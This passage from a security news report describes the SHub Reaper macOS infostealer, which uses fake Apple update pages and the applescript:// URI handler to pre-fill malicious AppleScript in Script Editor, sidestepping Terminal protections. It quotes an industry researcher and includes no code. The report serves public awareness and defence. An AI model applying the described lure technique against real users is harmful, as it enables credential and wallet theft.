Reaper changes tactics by moving execution into Apple’s Script Editor, sidestepping the protections Apple recently introduced to curb Terminal-based attacks. The end goal, however, remains credential theft, wallet compromise, and persistent access.
“The SHub Reaper variant represents a noteworthy evolution in macOS infostealers by shifting away from standard social engineering tactics that require victims to manually paste commands into the Terminal,” said Jason Soroko, senior fellow at Sectigo. “This approach lowers the technical barrier for infection and demonstrates a strategic pivot toward abusing native application handlers rather than relying purely on user error.”
Fake Apple updates run hidden AppleScript
The attack starts with users pulled onto malicious websites displaying fake Apple security alerts. The pages then initiate a ClickFix workflow by instructing users to launch a supposed fix through the Script Editor, instead of the Terminal.
Rather than getting the user to copy and paste shell commands like earlier, Reaper now abuses the applescript:// URI handler to pre-populate malicious AppleScript inside Script Editor. The victim is then socially engineered, through the ClickFix, into running the script themselves.
